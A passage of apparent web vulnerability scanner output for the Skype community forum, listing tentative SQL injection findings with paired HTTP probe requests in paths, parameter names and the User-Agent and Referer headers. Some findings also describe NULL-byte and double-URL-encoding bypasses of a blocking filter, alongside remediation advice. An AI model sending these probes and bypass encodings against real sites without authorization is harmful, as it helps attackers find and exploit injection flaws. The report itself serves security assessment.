GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> All Posts - ...[SNIP]...
1.20. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/forums/recentpostspage/category-id/English/post-type/message?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/forums/recentpostspage/category-id/English/post-type/message?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/forums/recentpostspage/category-id'/English/post-type/thread HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/forums/recentpostspage/category-id''/English/post-type/thread HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Request 2
GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id%2527/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/help/faqpage/faq-category-id%2527%2527/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'
Request 2
GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Request 2
GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Help - Skype ...[SNIP]...
1.26. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://community.skype.com
Path: /t5/help/faqpage/faq-category-id/ideas
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/ideas?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/help/faqpage/faq-category-id/ideas?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'
Request 2
GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/participation%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/help/faqpage/faq-category-id/participation%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Request 2
GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Help - Skype ...[SNIP]...
1.30. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://community.skype.com
Path: /t5/help/faqpage/faq-category-id/qa
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/help/faqpage/faq-category-id/qa?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/help/faqpage/faq-category-id/qa?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/video%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/help/faqpage/faq-category-id/video%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/iPad%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/iPad%2527%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527%2527/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Request 2
GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.35. http://community.skype.com/t5/iPhone/bd-p/iPhone [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://community.skype.com
Path: /t5/iPhone/bd-p/iPhone
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/iPhone/bd-p/iPhone?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/iPhone/bd-p/iPhone?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.36. http://community.skype.com/t5/notifications/notifymoderatorpage/message-uid/25246 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/tag%2527/Mac/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Request 2
GET /t5/tag%2527%2527/Mac/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Request 2
GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
1.39. http://community.skype.com/t5/tag/Video/tg-p/category-id/English [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/tag/Video/tg-p/category-id/English
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/tag/Video/tg-p/category-id/English?1%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/tag/Video/tg-p/category-id/English?1%2527%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Tag: "Video" ...[SNIP]...
1.40. http://community.skype.com/t5/tag/call/tg-p/category-id/English [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/tag/call/tg-p/category-id/English
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/tag/call/tg-p/category-id/English?1%00'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/tag/call/tg-p/category-id/English?1%00''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/tag/crash/tg-p/category-id/English%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:46:57 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 X-Pad: avoid browser bug Content-Length: 35824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Node 0 was N ...[SNIP]... <link href="http://community.skype.com/t5/errors/errorpage/tag-name/crash/tag-id/32/category-id/English%27" rel="canonical"> ...[SNIP]... <div class="exception-page-message NoSuchNodeException lia-component-content" class="exception-page-message NoSuchNodeException"> ...[SNIP]...
Request 2
GET /t5/tag/crash/tg-p/category-id/English%2527%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.42. http://community.skype.com/t5/tag/error/tg-p/category-id/English [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/tag/error/tg-p/category-id/English
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/tag/error/tg-p/category-id/English?1%00'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/tag/error/tg-p/category-id/English?1%00''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close
GET /t5/user/viewprofilepage/user-id/165954 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/user/viewprofilepage'/user-id/165958 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:46:29 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 36400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Page Not Fou ...[SNIP]... <link href="http://community.skype.com/t5/errors/error404page" rel="canonical"> ...[SNIP]...
Request 2
GET /t5/user/viewprofilepage''/user-id/165958 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
